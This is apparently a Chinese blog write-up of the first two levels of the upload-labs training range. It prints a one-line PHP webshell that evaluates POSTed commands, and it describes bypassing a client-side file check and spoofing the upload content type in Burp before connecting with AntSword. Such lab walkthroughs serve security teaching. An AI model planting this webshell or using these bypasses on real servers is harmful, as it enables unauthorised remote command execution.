upload-labs靶场通关

前提准备

一句话木马的文件,我这里是1.php

<?php @eval($_POST[cmd]); ?>

第一关--Pass-01

这里我们先进入第一关,直接上传1.php文件

 此时页面回显不允许上传,但是页面并未加载,说明是在前端进行审核的,我们打开F12查看页面源代码

 这里我们发现页面中存在checkFile()函数用于检查文件类型,我们手动删除后再次上传

 上传成功,直接用蚁剑等工具进行连接

第二关--Pass-02

查看页面源代码我们得知文件上传的类型需要为图片类型,我们继续上传1.php用bp抓包进行更改 

 抓包得到这个请求包,我们将类型改为图片类型选择放行

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值